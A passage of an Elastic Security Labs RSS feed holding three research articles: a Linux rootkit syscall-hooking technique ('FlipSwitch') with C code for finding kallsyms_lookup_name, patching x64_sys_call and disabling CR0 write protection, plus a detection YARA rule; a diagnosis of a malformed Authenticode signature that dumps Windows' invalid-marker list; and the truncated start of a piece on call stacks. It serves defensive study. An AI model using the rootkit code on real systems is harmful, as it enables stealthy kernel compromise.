            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/immutable-illusion/immutable-illusion.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[FlipSwitch: a Novel Syscall Hooking Technique]]></title>
            <link>https://www.elastic.co/kr/security-labs/flipswitch-linux-rootkit</link>
            <guid>flipswitch-linux-rootkit</guid>
            <pubDate>Tue, 30 Sep 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[FlipSwitch offers a fresh look at bypassing Linux kernel defenses, revealing a new technique in the ongoing battle between cyber attackers and defenders.]]></description>
            <content:encoded><![CDATA[<h2>FlipSwitch: a Novel Syscall Hooking Technique</h2>
<p>Syscall hooking, particularly by overwriting pointers to syscall handlers, has been a cornerstone of Linux rootkits like Diamorphine and PUMAKIT, enabling them to hide their presence and control the flow of information. While other hooking mechanisms exist, such as ftrace and eBPF, each has its own pros and cons, and most have some form of limitation. Function pointer overwrites remain the most effective and simple way of hooking syscalls in the kernel.</p>
<p>However, the Linux kernel is a moving target. With each new release, the community introduces changes that can render entire classes of malware obsolete overnight. This is precisely what happened with the release of <a href="https://github.com/torvalds/linux/blob/v6.9/arch/x86/entry/syscall_64.c"><strong>Linux kernel 6.9</strong></a>, which introduced a fundamental change to the syscall dispatch mechanism for x86-64 architecture, effectively neutralizing traditional syscall hooking methods.</p>
<h3>The Walls Are Closing In: The Death of a Classic Hooking Technique</h3>
<p>To appreciate the significance of the changes in kernel 6.9, let's first revisit the classic method of syscall hooking. For years, the kernel used a simple array of function pointers called the <code>sys_call_table</code> to dispatch syscalls. The logic was beautifully simple, as seen in the kernel source:</p>
<pre><code class="language-c">// Pre-6.9: Direct array lookup
sys_call_table[__NR_kill](regs);
</code></pre>
<p>A rootkit could locate this table in memory, disable write protection, and overwrite the address of a syscall like <code>kill</code> or <code>getdents64</code> with a pointer to its own adversary-controlled function. This empowers a rootkit to filter the output of the <code>ls</code> command to hide malicious files or prevent a specific process from being terminated, for example. But the directness of this mechanism was also its weakness. With Linux kernel 6.9, the game changed completely when the direct array lookup was replaced with a more efficient and secure switch statement-based dispatch mechanism:</p>
<pre><code class="language-c">// Kernel 6.9+: Switch-statement dispatch
long x64_sys_call(const struct pt_regs *regs, unsigned int nr)
{
    switch (nr) {
    #include &lt;asm/syscalls_64.h&gt; // Expands to case statements
    default: return __x64_sys_ni_syscall(regs);
    }
}
</code></pre>
<p>This change, while seemingly subtle, was a death blow to traditional syscall hooking. The <code>sys_call_table</code> still exists for compatibility with tracing tools, but it is no longer used for the actual dispatch of syscalls. Any modifications to it are simply ignored.</p>
<h3>Finding a New Way In: The FlipSwitch Technique</h3>
<p>We knew that the kernel still had to call the original syscall functions <em>somehow</em>. The logic was still there, just hidden behind a new layer of indirection. This led to the development of <a href="https://github.com/1337-42/FlipSwitch-dev/">FlipSwitch</a>, a technique that bypasses the new switch statement implementation by directly patching the compiled machine code of the kernel's syscall dispatcher.</p>
<p>Here's a breakdown of how it works:</p>
<p>The first step is to find the address of the original syscall function we want to hook. Ironically, the now-defunct <code>sys_call_table</code> is the perfect tool for this. We can still look up the address of <code>sys_kill</code> in this table to get a reliable pointer to the original function.</p>
<p>A common method to locate kernel symbols is the <code>kallsyms_lookup_name</code> function. This function provides a programmatic way to find the address of any exported kernel symbol by its name. For instance, we can use <code>kallsyms_lookup_name(&quot;sys_kill&quot;)</code> to obtain the address of the <code>sys_kill</code> function, providing a flexible and reliable way to obtain function pointers even when the <code>sys_call_table</code> is not directly usable for dispatch.</p>
<p>It's important to note that <code>kallsyms_lookup_name</code> is generally not exported by default, meaning it's not directly accessible to loadable kernel modules. This restriction enhances kernel security. However, a common technique to indirectly access <code>kallsyms_lookup_name</code> is by using a <code>kprobe</code>. By placing a <code>kprobe</code> on a known kernel function, a module can then use the kprobe's internal structure to derive the address of the original, probed function. From this, a function pointer to <code>kallsyms_lookup_name</code> can often be obtained through careful analysis of the kernel's memory layout, such as by examining nearby memory regions relative to the probed function's address.</p>
<pre><code class="language-c">/**
 * Find the address of kallsyms_lookup_name using kprobes
 * @return Pointer to kallsyms_lookup_name function or NULL on failure
 */
void *find_kallsyms_lookup_name(void)
{
    struct kprobe *kp;
    void *addr;

    kp = kzalloc(sizeof(*kp), GFP_KERNEL);
    if (!kp)
        return NULL;

    kp-&gt;symbol_name = O_STRING(&quot;kallsyms_lookup_name&quot;);
    if (register_kprobe(kp) != 0) {
        kfree(kp);
        return NULL;
    }

    addr = kp-&gt;addr;
    unregister_kprobe(kp);
    kfree(kp);

    return addr;
}
</code></pre>
<p>After finding the address of <code>kallsyms_lookup_name</code>, we can use it to find pointers to the symbols that we need to continue the process of placing a hook.</p>
<p>With the target address in hand, we then turn our attention to the <code>x64_sys_call</code> function, the new home of the syscall dispatch logic. We begin to scan its raw machine code, byte by byte, looking for a call instruction. On x86-64, the call instruction has a specific one-byte opcode: <code>0xe8</code>. This byte is followed by a 4-byte relative offset that tells the CPU where to jump to.</p>
<p>This is where the magic happens. We're not just looking for <em>any</em> call instruction. We're looking for a call instruction that, when combined with its 4-byte offset, points directly to the address of the original <code>sys_kill</code> function we found previously. This combination of the <code>0xe8</code> opcode and the specific offset is a unique signature within the <code>x64_sys_call</code> function. There is only one instruction that matches this pattern.</p>
<pre><code class="language-c">/* Search for call instruction to sys_kill in x64_sys_call */
    for (size_t i = 0; i &lt; DUMP_SIZE - 4; ++i) {
        if (func_ptr[i] == 0xe8) { /* Found a call instruction */
            int32_t rel = *(int32_t *)(func_ptr + i + 1);
            void *call_addr = (void *)((uintptr_t)x64_sys_call + i + 5 + rel);
            
            if (call_addr == (void *)sys_call_table[__NR_kill]) {
                debug_printk(&quot;Found call to sys_kill at offset %zu\n&quot;, i);
</code></pre>
<p>Once we've located this unique instruction, we've found our insertion point. But before we can modify the kernel's code, we must bypass its memory protections. Since we are already executing within the kernel (ring 0), we can use a classic, powerful technique: disabling write protection by flipping a bit in the <code>CR0</code> register. The <code>CR0</code> register controls basic processor functions, and its 16th bit (Write Protect) prevents the CPU from writing to read-only pages. By temporarily clearing this bit, we permit ourselves to modify any part of the kernel's memory.</p>
<pre><code class="language-c">/**
 * Force write to CR0 register bypassing compiler optimizations
 * @param val Value to write to CR0
 */
static inline void write_cr0_forced(unsigned long val)
{
    unsigned long order;

    asm volatile(&quot;mov %0, %%cr0&quot; 
        : &quot;+r&quot;(val), &quot;+m&quot;(order));
}

/**
 * Enable write protection (set WP bit in CR0)
 */
static inline void enable_write_protection(void)
{
    unsigned long cr0 = read_cr0();
    set_bit(16, &amp;cr0);
    write_cr0_forced(cr0);
}

/**
 * Disable write protection (clear WP bit in CR0)
 */
static inline void disable_write_protection(void)
{
    unsigned long cr0 = read_cr0();
    clear_bit(16, &amp;cr0);
    write_cr0_forced(cr0);
}

</code></pre>
<p>With write protection disabled, we overwrite the 4-byte offset of the call instruction with a new offset that points to our own <code>fake_kill</code> function. We have, in effect, &quot;flipped the switch&quot; inside the kernel's own dispatcher, redirecting a single syscall to our malicious code while leaving the rest of the system untouched.</p>
<p>This technique is both precise and reliable. And, significantly, all changes are fully reverted when the kernel module is unloaded, leaving no trace of its presence.</p>
<p>The development of FlipSwitch is a testament to the ongoing cat-and-mouse game between attackers and defenders. As kernel developers continue to harden the Linux kernel, attackers will continue to find new and creative ways to bypass these defenses. We hope that by sharing this research, we can help the security community stay one step ahead.</p>
<h2>Detecting malware</h2>
<p>Detecting rootkits once they have been loaded into the kernel is exceptionally difficult, as they are designed to operate stealthily and evade detection by security tools. However, we have developed a YARA signature to identify the proof-of-concept for FlipSwitch. This signature can be used to detect the presence of the FlipSwitch rootkit in memory or on disk.</p>
<h3>YARA</h3>
<p>Elastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the Flipswitch proof of concept.</p>
<pre><code>rule Linux_Rootkit_Flipswitch_821f3c9e
{
	meta:
		author = &quot;Elastic Security&quot;
		description = &quot;Yara rule to detect the FlipSwitch rootkit PoC&quot;
		os = &quot;Linux&quot;
		arch = &quot;x86&quot;
		category_type = &quot;Rootkit&quot;
		family = &quot;Flipswitch&quot;
		threat_name = &quot;Linux.Rootkit.Flipswitch&quot;
		
	strings:
		$all_a = { FF FF 48 89 45 E8 F0 80 ?? ?? ?? 31 C0 48 89 45 F0 48 8B 45 E8 0F 22 C0 }
		$obf_b = { BA AA 00 00 00 BE 0D 00 00 00 48 C7 ?? ?? ?? ?? ?? 49 89 C4 E8 }
		$obf_c = { BA AA 00 00 00 BE 15 00 00 00 48 89 C3 E8 ?? ?? ?? ?? 48 89 DF 48 89 43 30 E8 ?? ?? ?? ?? 85 C0 74 0D 48 89 DF E8 }
		$main_b = { 41 54 53 E8 ?? ?? ?? ?? 48 C7 C7 ?? ?? ?? ?? 49 89 C4 E8 ?? ?? ?? ?? 4D 85 E4 74 2D 48 89 C3 48 85 }
		$main_c = { 48 85 C0 74 1F 48 C7 ?? ?? ?? ?? ?? ?? 48 89 C7 48 89 C3 E8 ?? ?? ?? ?? 85 C0 74 0D 48 89 DF E8 ?? ?? ?? ?? 45 31 E4 EB 14 }
		$debug_b = { 48 89 E5 41 54 53 48 85 C0 0F 84 ?? ?? 00 00 48 C7 }
		$debug_c = { 48 85 C0 74 45 48 C7 ?? ?? ?? ?? ?? ?? 48 89 C7 48 89 C3 E8 ?? ?? ?? ?? 85 C0 75 26 48 89 DF 4C 8B 63 28 E8 ?? ?? ?? ?? 48 89 DF E8 }

	condition:
		#all_a&gt;=2 and (1 of ($obf_*) or 1 of ($main_*) or 1 of ($debug_*))
}

</code></pre>
<h2>References</h2>
<p>The following were referenced throughout the above research:</p>
<ul>
<li><a href="https://github.com/1337-42/FlipSwitch-dev/">https://github.com/1337-42/FlipSwitch-dev/</a></li>
<li><a href="https://www.virusbulletin.com/conference/vb2025/abstracts/unmasking-unseen-deep-dive-modern-linux-rootkits-and-their-detection/">https://www.virusbulletin.com/conference/vb2025/abstracts/unmasking-unseen-deep-dive-modern-linux-rootkits-and-their-detection/</a></li>
</ul>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/flipswitch-linux-rootkit/Security Labs Images 5.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Investigating a Mysteriously Malformed Authenticode Signature]]></title>
            <link>https://www.elastic.co/kr/security-labs/malformed-authenticode-signature</link>
            <guid>malformed-authenticode-signature</guid>
            <pubDate>Thu, 04 Sep 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[An in-depth investigation tracing a Windows Authenticode validation failure from vague error codes to undocumented kernel routines.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>Elastic Security Labs recently encountered a signature validation issue with one of our Windows binaries. The executable was signed using <code>signtool.exe</code> as part of our standard continuous integration (CI) process, but on this occasion, the output file failed signature validation with the following error message:</p>
<blockquote>
<p>The digital signature of the object is malformed. For technical detail, see security bulletin MS13-098.</p>
</blockquote>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/malformed-authenticode-signature/image2.png" alt="MS13-098 error" title="MS13-098 error" /></p>
<p>The <a href="https://learn.microsoft.com/en-us/security-updates/securitybulletins/2013/ms13-098">documentation for MS13-098</a> is vague, but it describes a potential vulnerability related to malformed Authenticode signatures. Nothing obvious had changed on our end that might explain this new error, so we needed to investigate the cause and resolve the issue.</p>
<p>While we identified that this issue was affecting one of our signed Windows binaries, it could impact any binary. We are publishing this research as a reference for anyone else who may encounter the same problem in the future.</p>
<h2>Diagnosis</h2>
<p>To investigate further, we created a basic test program that called the Windows <code>WinVerifyTrust</code> function against the problematic executable to manually validate the signature. This revealed that it was failing with the error code <code>TRUST_E_MALFORMED_SIGNATURE</code>.</p>
<p><code>WinVerifyTrust</code> is a complex function, but after attaching a debugger, we discovered that the error code was being set at the following point:</p>
<pre><code class="language-c">dwReserved1 = psSipSubjectInfo-&gt;dwReserved1;
if(!dwReserved1)
    goto LABEL_58;
v40 = I_GetRelaxedMarkerCheckFlags(a1, v22, (unsigned int *)&amp;pvData);
if(v40 &lt; 0)
    break;
if(!pvData)
    v42 = 0x80096011;    // TRUST_E_MALFORMED_SIGNATURE
</code></pre>
<p>As shown above, if <code>psSipSubjectInfo-&gt;dwReserved1</code> is not <code>0</code>, the code calls <code>I_GetRelaxedMarkerCheckFlags</code>. If this function returns no data, the code sets the <code>TRUST_E_MALFORMED_SIGNATURE</code> error and exits.</p>
<p>When stepping through the code with our problematic binary, we saw that <code>dwReserved1</code> was indeed set to <code>1</code>. Running the same test against a correctly signed binary, this value was always <code>0</code>, which skips the call to <code>I_GetRelaxedMarkerCheckFlags</code>.</p>
<p>Looking into <code>I_GetRelaxedMarkerCheckFlags</code>, we saw that it simply checks for the presence of a specific attribute: <code>1.3.6.1.4.1.311.2.6.1</code>. A quick online search turned up very little other than the fact that this object identifier (OID) is labeled as <code>SpcRelaxedPEMarkerCheck</code>.</p>
<pre><code class="language-c">__int64 __fastcall I_GetRelaxedMarkerCheckFlags(struct _CRYPT_PROVIDER_DATA *a1, DWORD a2, unsigned int *a3)
{
    unsigned int v4; // ebx
    CRYPT_PROVIDER_SGNR *ProvSignerFromChain; // rax
    PCRYPT_ATTRIBUTE Attribute; // rax
    signed int LastError; // eax
    DWORD pcbStructInfo; // [rsp+60h] [rbp+18h] BYREF

    pcbStructInfo = 4;
    v4 = 0;
    *a3 = 0;
    ProvSignerFromChain = WTHelperGetProvSignerFromChain(a1, a2, 0, 0);
    if(ProvSignerFromChain)
    {
        Attribute = CertFindAttribute(
            &quot;1.3.6.1.4.1.311.2.6.1&quot;,
            ProvSignerFromChain-&gt;psSigner-&gt;AuthAttrs.cAttr,
            ProvSignerFromChain-&gt;psSigner-&gt;AuthAttrs.rgAttr);
        if(Attribute)
        {
            if(!CryptDecodeObject(
                a1-&gt;dwEncoding,
                (LPCSTR)0x1B,
                Attribute-&gt;rgValue-&gt;pbData,
                Attribute-&gt;rgValue-&gt;cbData,
                0,
                a3,
                &amp;pcbStructInfo))
            {
                return HRESULT_FROM_WIN32(GetLastError());
            }
        }
    }

    return v4;
}
</code></pre>
<p>Our binary did not have this attribute, which caused the function to return no data and triggered the error. The function names reminded us of an optional parameter that we had previously seen in <code>signtool.exe</code>:</p>
<blockquote>
<p><code>/rmc</code> - Specifies signing a PE file with the relaxed marker check semantic. The flag is ignored for non-PE files. During verification, certain authenticated sections of the signature will bypass invalid PE markers check. This option should only be used after careful consideration and reviewing the details of MSRC case MS12-024 to ensure that no vulnerabilities are introduced.</p>
</blockquote>
<p>Based on our analysis, we suspected that re-signing the executable with the “relaxed marker check” flag (<code>/rmc</code>), and as expected, the signature was now valid.</p>
<h3>Root cause analysis</h3>
<p>While the workaround above resolved our immediate problem, it clearly wasn’t the root cause. We needed to investigate further to understand why the internal <code>dwReserved1</code> flag was set in the first place.</p>
<p>This field is part of the <code>SIP_SUBJECTINFO</code> structure, which is <a href="https://learn.microsoft.com/en-us/windows/win32/api/mssip/ns-mssip-sip_subjectinfo">documented on MSDN</a> - but unfortunately, it didn’t help much in this case:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/malformed-authenticode-signature/image3.png" alt="SIP_SUBJECTINFO structure comment" title="SIP_SUBJECTINFO structure comment" /></p>
<p>To find where this field was being set, we worked backwards and identified a point where <code>dwReserved1</code> was still <code>0</code> - i.e., before the flag had been set. We placed a hardware breakpoint (on write) on the <code>dwReserved1</code> field and resumed execution. The breakpoint was hit in the <code>SIPObjectPE_::GetMessageFromFile</code> function:</p>
<pre><code class="language-c">__int64 __fastcall SIPObjectPE_::GetMessageFromFile(
    SIPObjectPE_ *this,
    struct SIP_SUBJECTINFO_ *a2,
    struct _WIN_CERTIFICATE *a3,
    unsigned int a4,
    unsigned int *a5)
{
    __int64 v5; // rcx
    __int64 result; // rax
    DWORD v8; // [rsp+40h] [rbp+8h] BYREF

    v5 = *((_QWORD*)this + 1);
    v8 = 0;
    result = ImageGetCertificateDataEx(v5, a4, a3, a5, &amp;v8);
    if((_DWORD)result)
        a2-&gt;dwReserved1 = v8;

    return result;
}
</code></pre>
<p>This function calls the <code>ImageGetCertificateDataEx</code> API which is exported by <code>imagehlp.dll</code>. The value returned by the fifth parameter of this function is stored in <code>dwReserved1</code>. This value ultimately determines whether the PE is considered &quot;malformed&quot; in the manner we have been observing.</p>
<p>Unfortunately, <code>ImageGetCertificateDataEx</code> is undocumented on MSDN. However, an earlier variant, <code>ImageGetCertificateData</code>, <a href="https://learn.microsoft.com/en-us/windows/win32/api/imagehlp/nf-imagehlp-imagegetcertificatedata">is documented</a>:</p>
<pre><code class="language-c">BOOL IMAGEAPI ImageGetCertificateData(
  [in]      HANDLE            FileHandle,
  [in]      DWORD             CertificateIndex,
  [out]     LPWIN_CERTIFICATE Certificate,
  [in, out] PDWORD            RequiredLength
);
</code></pre>
<p>This function extracts the contents of the <code>IMAGE_DIRECTORY_ENTRY_SECURITY</code> directory from the PE headers. Manual analysis of the <code>ImageGetCertificateDataEx</code> function showed that the first four parameters match those of <code>ImageGetCertificateData</code>, but with one additional output parameter at the end.</p>
<p>We wrote a simple test program that allows us to call this function and perform checks against the unknown fifth parameter:</p>
<pre><code class="language-c">#include &lt;stdio.h&gt;
#include &lt;windows.h&gt;
#include &lt;imagehlp.h&gt;

int main()
{
    HANDLE hFile = NULL;
    DWORD dwCertLength = 0;
    WIN_CERTIFICATE *pCertData = NULL;
    DWORD dwUnknown = 0;
    BOOL (WINAPI *pImageGetCertificateDataEx)(HANDLE FileHandle, DWORD CertificateIndex, LPWIN_CERTIFICATE Certificate, PDWORD RequiredLength, DWORD *pdwUnknown);

    // open target executable
    hFile = CreateFileA(&quot;C:\\users\\matthew\\sample-executable.exe&quot;, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
    if(hFile == INVALID_HANDLE_VALUE)
    {
        printf(&quot;Failed to open input file\n&quot;);
        return 1;
    }

    // locate ImageGetCertificateDataEx export in imagehlp.dll
    pImageGetCertificateDataEx = (BOOL(WINAPI*)(HANDLE,DWORD,LPWIN_CERTIFICATE,PDWORD,DWORD*))GetProcAddress(LoadLibraryA(&quot;imagehlp.dll&quot;), &quot;ImageGetCertificateDataEx&quot;);
    if(pImageGetCertificateDataEx == NULL)
    {
        printf(&quot;Failed to locate ImageGetCertificateDataEx\n&quot;);
        return 1;
    }

    // get required length
    dwCertLength = 0;
    if(pImageGetCertificateDataEx(hFile, 0, NULL, &amp;dwCertLength, &amp;dwUnknown) == 0)
    {
        if(GetLastError() != ERROR_INSUFFICIENT_BUFFER)
        {
            printf(&quot;ImageGetCertificateDataEx error (1)\n&quot;);
            return 1;
        }
    }

    // allocate data
    printf(&quot;Allocating %u bytes for certificate...\n&quot;, dwCertLength);
    pCertData = (WIN_CERTIFICATE*)malloc(dwCertLength);
    if(pCertData == NULL)
    {
        printf(&quot;Failed to allocate memory\n&quot;);
        return 1;
    }

    // read certificate data and dwUnknown flag
    if(pImageGetCertificateDataEx(hFile, 0, pCertData, &amp;dwCertLength, &amp;dwUnknown) == 0)
    {
        printf(&quot;ImageGetCertificateDataEx error (2)\n&quot;);
        return 1;
    }

    printf(&quot;Finished - dwUnknown: %u\n&quot;, dwUnknown);

    return 0;
}
</code></pre>
<p>Running this against a variety of executables confirmed our expectations: the unknown return value was <code>1</code> for our “broken” executable, and <code>0</code> for correctly signed binaries. This confirmed that the issue originated somewhere within the <code>ImageGetCertificateDataEx</code> function.</p>
<p>Further analysis of this function revealed that the unknown flag is being set by another internal function: <code>IsBufferCleanOfInvalidMarkers</code>.</p>
<pre><code class="language-c">...
if(!IsBufferCleanOfInvalidMarkers(v25, v15, pdwUnknown))
{
    LastError = GetLastError();
    if(!pdwUnknown)
        goto LABEL_34;
}
...
</code></pre>
<p>After cleaning up the <code>IsBufferCleanOfInvalidMarkers</code> function, we observed the following:</p>
<pre><code class="language-c">DWORD IsBufferCleanOfInvalidMarkers(BYTE *pData, DWORD dwLength, DWORD *pdwInvalidMarkerFound)
{
    if(!_InterlockedCompareExchange64(&amp;global_InvalidMarkerList, 0, 0))
        LoadInvalidMarkers();

    if(!RabinKarpFindPatternInBuffer(pData, dwLength, pdwInvalidMarkerFound))
        return 1;

    SetLastError(0x80096011); // TRUST_E_MALFORMED_SIGNATURE

    return 0;
}
</code></pre>
<p>This function loads a global list of &quot;invalid markers&quot; using <code>LoadInvalidMarkers</code>, if they are not already loaded. <code>imagehlp.dll</code> contains a hardcoded default list of markers, but also checks the registry for a user-defined list at the following path:</p>
<p><code>HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Wintrust\Config\PECertInvalidMarkers</code></p>
<p>This registry value does not appear to exist by default.</p>
<p>The function then performs a search across the entire PE signature data, looking for any of these markers. If a match is found, <code>pdwInvalidMarkerFound</code> is set to <code>1</code>, which maps directly to the <code>psSipSubjectInfo-&gt;dwReserved1</code> value mentioned earlier.</p>
<h3>Dumping the invalid markers</h3>
<p>The markers are stored in an undocumented structure inside <code>imagehlp.dll</code>. After reverse-engineering the <code>RabinKarpFindPatternInBuffer</code> function noted above, we wrote a small tool to dump the entire list of markers:</p>
<pre><code class="language-c">#include &lt;stdio.h&gt;
#include &lt;windows.h&gt;

int main()
{
    HMODULE hModule = LoadLibraryA(&quot;imagehlp.dll&quot;);

    // hardcoded address - imagehlp.dll version:
    // 509ef25f9bac59ebf1c19ec141cb882e5c1a8cb61ac74a10a9f2bd43ed1f0585
    BYTE *pInvalidMarkerData = (BYTE*)hModule + 0xC4D8;

    BYTE *pEntryList = (BYTE*)*(DWORD64*)(pInvalidMarkerData + 20);
    DWORD dwEntryCount = *(DWORD*)pInvalidMarkerData;
    for(DWORD i = 0; i &lt; dwEntryCount; i++)
    {
        BYTE *pCurrEntry = pEntryList + (i * 18);
        BYTE bLength = *(BYTE*)(pCurrEntry + 9);
        BYTE *pString = (BYTE*)*(DWORD64*)(pCurrEntry + 10);
        for(DWORD ii = 0; ii &lt; bLength; ii++)
        {
            if(isprint(pString[ii]))
            {
                // printable character
                printf(&quot;%c&quot;, pString[ii]);
            }
            else
            {
                // non-printable character
                printf(&quot;\\x%02X&quot;, pString[ii]);
            }
        }
        printf(&quot;\n&quot;);
    }

    return 0;
}
</code></pre>
<p>This produced the following results:</p>
<pre><code>PK\x01\x02
PK\x05\x06
PK\x03\x04
PK\x07\x08
Rar!\x1A\x07\x00
z\xBC\xAF'\x1C
**ACE**
!&lt;arch&gt;\x0A
MSCF\x00\x00\x00\x00
\xEF\xBE\xAD\xDENull
Initializing Wise Installation Wizard
zlb\x1A
KGB_arch
KGB2\x00
KGB2\x01
ENC\x00
disk%i.pak
&gt;-\x1C\x0BxV4\x12
ISc(
Smart Install Maker
\xAE\x01NanoZip
;!@Install@
EGGA
ArC\x01
StuffIt!
-sqx-
PK\x09\x0A
&quot;\x0B\x01\x0B
-lh0-
-lh1-
-lh2-
-lh3-
-lh4-
-lh5-
-lh6-
-lh7-
-lh8-
-lh9-
-lha-
-lhb-
-lhc-
-lhd-
-lhe-
-lzs-
-lz2-
-lz3-
-lz4-
-lz5-
-lz7-
-lz8-
&lt;#$@@$#&gt;
</code></pre>
<p>As expected, this appears to be a list of magic values pertaining to old installers and compressed archive formats. This aligns with the description of <a href="https://learn.microsoft.com/en-us/security-updates/securitybulletins/2013/ms13-098">MS13-098</a>, which hints towards certain installers being affected.</p>
<p>We suspected this was related to self-extracting executables. If an executable reads itself from disk and scans its own data for an embedded archive (e.g., a ZIP file), an attacker could potentially append malicious data to the signature section without invalidating the signature - since signature data cannot hash itself. This could potentially cause the vulnerable executable to locate the malicious data before the original data, especially if it scans backwards from the end of the file.</p>
<p>We later found an old <a href="https://recon.cx/2012/schedule/events/246.en.html">RECon talk from 2012 by Igor Glücksmann</a>, which describes this exact scenario and appears to confirm our hypothesis.</p>
<p>Microsoft's fix involved scanning the PE signature block for known byte patterns that could indicate this type of abuse.</p>
<h3>Investigating the false positive</h3>
<p>Upon further debugging, we discovered that the binary was being flagged due to the signature data containing the <code>EGGA</code> marker from the list above:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/malformed-authenticode-signature/image1.png" alt="EGGA marker" title="EGGA marker" /></p>
<p>In the context of the list of markers above, the <code>EGGA</code> signature appears to relate to a specific header value used by an archive format called <a href="http://justsolve.archiveteam.org/wiki/EGG_(ALZip)">ALZip</a>. Our code does not make any use of this file format.</p>
<p>Microsoft’s heuristic treated the presence of <code>EGGA</code> as evidence that malicious archive data had been embedded in the PE signature. In practice, nothing of the sort was present. The signature block itself happened to include those four bytes as part of the hashed data.</p>
<p>Collisions like this are unusual, but page hashing (<code>/ph</code>) made it more likely. By expanding the size of the signature block, page hashing increases the surface area for coincidental matches and increases the likelihood of triggering the heuristic.</p>
<p>The binary didn’t contain any self-extracting routines, so the hit on <code>EGGA</code> was a false positive. In that context, the warning had no bearing on the file’s integrity. This meant it was safe to re-sign the file with <code>/rmc</code> to restore the expected validation.</p>
<h3>Conclusion</h3>
<p>It is well known that additional data can be embedded in a PE file without breaking its signature by appending it to the security block. Even some <a href="https://learn.microsoft.com/en-us/archive/blogs/ieinternals/caveats-for-authenticode-code-signing">legitimate software products</a> take advantage of this to embed user-specific metadata into signed executables. However, we were not aware that Microsoft had implemented heuristics to detect specific malicious cases of this, even though they were introduced back in 2012.</p>
<p>The original error message was very vague, and we were unable to find any documentation or references online that helped explain the behavior. Even searching for the associated registry value after discovering it (<code>PECertInvalidMarkers</code>) yielded zero results.</p>
<p>What we uncovered is that Microsoft added heuristic scanning of signature blocks more than a decade ago to counter specific abuse cases. Those heuristics reside in a hardcoded list of “invalid markers,” many of which are tied to outdated installers and archive formats. Our binary happened to collide with one of those markers when signed with page hashing enabled, creating a validation failure with no clear documentation and no public references to the underlying registry key or detection logic.</p>
<p>The absence of online discussions regarding this failure mode, aside from a single unresolved <a href="https://developercommunity.visualstudio.com/t/malformed-digital-signature-ms13-098-1/235599">Visual Studio Developer Community post from 2018</a>, made the initial diagnosis difficult. By publishing this analysis, we want to provide a technical reference point for others who may encounter the same problem. In our case, resolving the issue required deep troubleshooting that few outside this space would normally need to exercise. For teams automating code signing, the key lesson is to integrate signature validation checks early and be aware that heuristic marker detection can lead to edge-case failures.</p>
<h2>Additional references</h2>
<p>The author can be found on X at <a href="https://x.com/x86matthew">@x86matthew.</a></p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/malformed-authenticode-signature/malformed-authenticode-signature.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Call Stacks: No More Free Passes For Malware]]></title>
            <link>https://www.elastic.co/kr/security-labs/call-stacks-no-more-free-passes-for-malware</link>
            <guid>call-stacks-no-more-free-passes-for-malware</guid>
            <pubDate>Thu, 12 Jun 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[We explore the immense value that call stacks bring to malware detection and why Elastic considers them to be vital Windows endpoint telemetry despite the architectural limitations.]]></description>
            <content:encoded><![CDATA[<h2>Call stacks provide the who</h2>
<p>One of Elastic’s key Windows endpoint telemetry differentiators is <strong>call stacks</strong>.</p>
<p>Most detections rely on <em>what</em> is happening — and this is often insufficient as most behaviours are dual purpose. With call stacks, we add the fine-grained ability to also determine <em>who</em> is performing the activity. This combination gives us an unparalleled ability to uncover malicious activity. By feeding this deep telemetry to <a href="https://www.elastic.co/kr/docs/reference/integrations/endpoint">Elastic Defend</a>’s on-host rule engine, we can quickly respond to emerging threats.</p>
<h2>Call stacks are a beautiful lie</h2>
<p>In computer science, a <a href="https://en.wikipedia.org/wiki/Stack_(abstract_data_type)">stack</a> is a last-in, first-out data structure. Similar to a stack of physical items, it is only possible to add or remove the top element. A <a href="https://www.elastic.co/kr/security-labs/peeling-back-the-curtain-with-call-stacks">call stack</a> is a stack that contains information about the currently active subroutine calls.</p>
<p>On x64 hosts, this call stack can only be accurately generated using execution tracing features on the CPU, such as <a href="https://www.blackhat.com/docs/us-16/materials/us-16-Pierce-Capturing-0days-With-PERFectly-Placed-Hardware-Traps-wp.pdf">Intel LBR</a>, Intel BTS, Intel AET, <a href="https://www.microsoft.com/en-us/research/wp-content/uploads/2017/01/griffin-asplos17.pdf">Intel IPT</a>, and <a href="https://lwn.net/Articles/824613/">x64 Architectural LBR</a>. These tracing features were designed for performance profiling and debugging purposes, but can be used in some security scenarios as well. However, what is more generally available is an <em>approximate</em> call stack that is recovered from a thread’s data stack via a mechanism called <a href="https://github.com/jdu2600/conference_talks/blob/main/2022-04-csidescbr-StackWalking.pdf">stack walking</a>.</p>
<p>In the <a href="https://codemachine.com/articles/x64_deep_dive.html">x64 architecture</a>, the “stack pointer register” (<code>rsp</code>) unsurprisingly points to a stack data structure, and there are efficient instructions to read and write the data on this stack. Additionally, the <code>call</code> instruction transfers control to a new subroutine but also saves a return address at the memory address referenced by the stack pointer. A <code>ret</code> instruction will later retrieve this saved address so that execution can return to where it left off. Functions in most programming languages are typically implemented using these two instructions, and both function parameters and local function variables will typically be allocated on this stack for performance. The portion of the stack related to a single function is called a stack frame.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/call-stacks-no-more-free-passes-for-malware/image2.png" alt="Windows x64 Calling Convention: Stack Frame - source https://www.ired.team/miscellaneous-reversing-forensics/windows-kernel-internals/windows-x64-calling-convention-stack-frame" /></p>
